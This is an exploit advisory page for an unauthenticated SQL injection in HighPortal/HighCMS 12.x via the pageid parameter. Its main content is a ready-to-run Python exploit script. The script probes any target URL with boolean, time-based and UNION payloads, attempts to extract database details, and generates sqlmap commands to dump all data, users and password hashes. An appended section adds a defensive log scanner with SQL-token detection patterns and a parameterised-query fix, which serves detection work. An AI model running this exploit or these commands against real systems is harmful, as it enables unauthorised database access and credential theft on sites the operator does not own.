HighPortal 12.x SQL Injection

17 Dec 2025 | Reported by: indoushka | Type: packetstorm | Source: packetstorm.news | 159 views

Unauthenticated SQL injection in HighPortal v12.x via pageid parameter could compromise the database.

Code
=============================================================================================================================================
    | # Title     : HighPortal v12.x SQL Injection Exploit                                                                                      |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits)                                                            |
    | # Vendor    : https://aryanic.com/                                                                                                        |
    =============================================================================================================================================
    
    POC : 
    
    [+] References : https://packetstorm.news/files/id/167170/
    
    
    [+] Summary : 
              
             A critical SQL injection vulnerability exists in HighCMS/HighPortal version 12.x.
             The vulnerability allows unauthenticated attackers to execute arbitrary SQL queries through the pageid parameter, potentially leading to complete database compromise.
    		 
    	
    [+] POC :  python poc.py
    
    #!/usr/bin/env python3
    """
    HighCMS/HighPortal v12.x SQL Injection Exploit
    Author: indoushka
    Vulnerability: SQL Injection in pageid parameter
    """
    
    import requests
    import sys
    import urllib3
    from argparse import ArgumentParser
    
    # Disable SSL warnings
    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
    
    class HighCMSExploit:
        def __init__(self, target):
            self.target = target.rstrip('/')
            self.session = requests.Session()
            self.session.headers.update({
                'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
                'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
                'Accept-Language': 'en-US,en;q=0.5',
                'Accept-Encoding': 'gzip, deflate',
                'Connection': 'keep-alive'
            })
        
        def check_vulnerability(self):
            """Check if target is vulnerable to SQL Injection"""
            print(f"[*] Checking vulnerability for: {self.target}")
            
            # Test payloads
            test_payloads = [
                "6528' AND '1'='1",
                "6528' AND '1'='2", 
                "6528' AND SLEEP(5)--",
                "6528 UNION SELECT 1,2,3,4,5--"
            ]
            
            vulnerable = False
            
            for payload in test_payloads:
                url = f"{self.target}/index.jsp?siteid=1&fkeyid=&siteid=1&pageid={payload}"
                
                try:
                    # Time-based SQL injection test
                    if "SLEEP" in payload:
                        import time
                        start_time = time.time()
                        response = self.session.get(url, timeout=10, verify=False)
                        end_time = time.time()
                        
                        if end_time - start_time >= 5:
                            print(f"[+] Time-based SQL Injection confirmed! (Delay: {end_time - start_time:.2f}s)")
                            vulnerable = True
                            break
                    else:
                        response = self.session.get(url, timeout=10, verify=False)
                        
                        # Check for error-based indicators
                        error_indicators = [
                            "SQL syntax",
                            "Microsoft OLE DB Provider",
                            "ODBC Driver",
                            "SQLServer",
                            "Unclosed quotation mark",
                            "syntax error"
                        ]
                        
                        for error in error_indicators:
                            if error.lower() in response.text.lower():
                                print(f"[+] Error-based SQL Injection confirmed!")
                                print(f"[+] Payload: {payload}")
                                vulnerable = True
                                break
                        
                        # Boolean-based test
                        if "'1'='1" in payload and response.status_code == 200:
                            true_response = response.text
                            
                        if "'1'='2" in payload and response.status_code == 200:
                            false_response = response.text
                            
                            if true_response != false_response:
                                print(f"[+] Boolean-based SQL Injection confirmed!")
                                vulnerable = True
                                break
                                
                except Exception as e:
                    print(f"[-] Error testing payload {payload}: {e}")
                    continue
            
            return vulnerable
        
        def exploit_union(self, columns=5):
            """Exploit using UNION-based SQL injection"""
            print(f"[*] Attempting UNION-based exploitation with {columns} columns")
            
            # Test different column counts
            for col_count in range(1, columns + 1):
                nulls = ','.join(['NULL'] * col_count)
                payload = f"6528 UNION SELECT {nulls}--"
                
                url = f"{self.target}/index.jsp?siteid=1&fkeyid=&siteid=1&pageid={payload}"
                
                try:
                    response = self.session.get(url, timeout=10, verify=False)
                    
                    if response.status_code == 200 and "error" not in response.text.lower():
                        print(f"[+] UNION injection successful with {col_count} columns")
                        
                        # Now extract data
                        self.extract_data(col_count)
                        return True
                        
                except Exception as e:
                    print(f"[-] Error with {col_count} columns: {e}")
            
            return False
        
        def extract_data(self, column_count):
            """Extract database information"""
            print("[*] Extracting database information...")
            
            # Get database version
            version_payloads = [
                "6528 UNION SELECT 1,@@version,3,4,5--",
                "6528 UNION SELECT 1,version(),3,4,5--", 
                "6528 UNION SELECT 1,banner,3,4,5 FROM v$version--"
            ]
            
            for payload in version_payloads:
                url = f"{self.target}/index.jsp?siteid=1&fkeyid=&siteid=1&pageid={payload}"
                
                try:
                    response = self.session.get(url, timeout=10, verify=False)
                    if response.status_code == 200:
                        # Look for version information in response
                        print("[+] Database version information extracted")
                        break
                except:
                    continue
            
            # Get current database user
            user_payload = f"6528 UNION SELECT 1,user(),3,4,5--"
            url = f"{self.target}/index.jsp?siteid=1&fkeyid=&siteid=1&pageid={user_payload}"
            
            try:
                response = self.session.get(url, timeout=10, verify=False)
                print("[+] Current user information extracted")
            except:
                pass
        
        def generate_sqlmap_command(self):
            """Generate sqlmap command for automated exploitation"""
            sqlmap_cmd = f'sqlmap -u "{self.target}/index.jsp?siteid=1&fkeyid=&siteid=1&pageid=6528" --batch --level=5 --risk=3'
            
            print("\n[+] SQLMap Commands:")
            print("=" * 50)
            print("# Basic detection:")
            print(f'sqlmap -u "{self.target}/index.jsp?siteid=1&fkeyid=&siteid=1&pageid=6528" --batch')
            
            print("\n# Full database dump:")
            print(f'sqlmap -u "{self.target}/index.jsp?siteid=1&fkeyid=&siteid=1&pageid=6528" --batch --dump-all')
            
            print("\n# Get database users:")
            print(f'sqlmap -u "{self.target}/index.jsp?siteid=1&fkeyid=&siteid=1&pageid=6528" --batch --users')
            
            print("\n# Get database passwords:")
            print(f'sqlmap -u "{self.target}/index.jsp?siteid=1&fkeyid=&siteid=1&pageid=6528" --batch --passwords')
    
    def main():
        banner = """
    
        HighCMS/HighPortal v12.x SQL Injection Exploit
        By: indoushka
        """
        print(banner)
        
        parser = ArgumentParser(description='HighCMS SQL Injection Exploit')
        parser.add_argument('-u', '--url', required=True, help='Target URL (e.g., https://example.com)')
        parser.add_argument('--check', action='store_true', help='Check vulnerability only')
        parser.add_argument('--exploit', action='store_true', help='Run full exploitation')
        parser.add_argument('--sqlmap', action='store_true', help='Generate sqlmap commands')
        
        args = parser.parse_args()
        
        exploit = HighCMSExploit(args.url)
        
        if args.check:
            if exploit.check_vulnerability():
                print("\n[!] Target is VULNERABLE to SQL Injection")
            else:
                print("\n[!] Target does not appear to be vulnerable")
        
        elif args.exploit:
            if exploit.check_vulnerability():
                print("\n[*] Starting exploitation...")
                exploit.exploit_union()
        
        elif args.sqlmap:
            exploit.generate_sqlmap_command()
        
        else:
            # Default: check and provide options
            if exploit.check_vulnerability():
                print("\n[+] Vulnerability confirmed!")
                print("\nAvailable options:")
                print("1. Run full exploitation: python exploit.py -u TARGET --exploit")
                print("2. Generate sqlmap commands: python exploit.py -u TARGET --sqlmap")
            else:
                print("\n[-] Target not vulnerable or not accessible")
    
    if __name__ == "__main__":
        if len(sys.argv) == 1:
            print("Usage: python highcms_exploit.py -u https://target.com")
            print("Options: --check, --exploit, --sqlmap")
            sys.exit(1)
        
        main()
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================
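
A defensive companion to the advisory, added here and not part of indoushka's PoC or the vendor's code: it scans web access logs for requests to index.jsp whose pageid is not a plain integer, which covers the boolean, time-based and UNION probes listed in the PoC. It assumes combined-format access logs and that legitimate pageid values are numeric (as the 6528 in the PoC suggests); the log lines are constructed samples.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Client address and request target from a combined-format access log line.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Tokens that appear in the probe strings listed in the advisory's PoC.
SQL_TOKENS = re.compile(r"(?i)\b(?:union|select|sleep)\b|--|'|@@")
NUMERIC_ID = re.compile(r"[0-9]{1,10}")  # assumption: real page ids are integers

def classify_pageid(value):
    """Return None for a plain numeric id, otherwise the reason it was flagged."""
    if NUMERIC_ID.fullmatch(value):
        return None
    hits = sorted({m.group(0).lower() for m in SQL_TOKENS.finditer(value)})
    return "sql-tokens:" + ",".join(hits) if hits else "non-numeric"

def scan(lines, path_suffix="/index.jsp"):
    """Return (client, pageid, reason) for every suspicious pageid value."""
    findings = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target = m.groups()
        parts = urlsplit(target)
        if not parts.path.lower().endswith(path_suffix):
            continue
        # parse_qs percent-decodes and keeps every value of a repeated parameter.
        for value in parse_qs(parts.query).get("pageid", []):
            reason = classify_pageid(value)
            if reason:
                findings.append((client, value, reason))
    return findings

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [17/Dec/2025:10:00:01 +0000] "GET /index.jsp?siteid=1&fkeyid=&siteid=1&pageid=6528 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [17/Dec/2025:10:00:05 +0000] "GET /index.jsp?siteid=1&pageid=6528%27%20AND%20%271%27=%271 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [17/Dec/2025:10:00:06 +0000] "GET /index.jsp?siteid=1&pageid=6528%27+AND+SLEEP(5)-- HTTP/1.1" 200 5120',
    '198.51.100.7 - - [17/Dec/2025:10:00:12 +0000] "GET /index.jsp?siteid=1&pageid=6528%20UNION%20SELECT%201,2,3,4,5-- HTTP/1.1" 200 4980',
    '203.0.113.5 - - [17/Dec/2025:10:01:00 +0000] "GET /index.jsp?pageid=12&pageid=abc HTTP/1.1" 200 5120',
    '203.0.113.5 - - [17/Dec/2025:10:01:02 +0000] "GET /about.jsp?pageid=1%27 HTTP/1.1" 404 312',
]

if __name__ == "__main__":
    for client, value, reason in scan(SAMPLE_LOG):
        print(f"{client}\t{reason}\t{value!r}")
```

The same integer-only rule is the natural server-side fix: validate pageid as an integer and bind it as a query parameter instead of concatenating it into the SQL string.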

Vulners AI Score: 8.2 (High risk)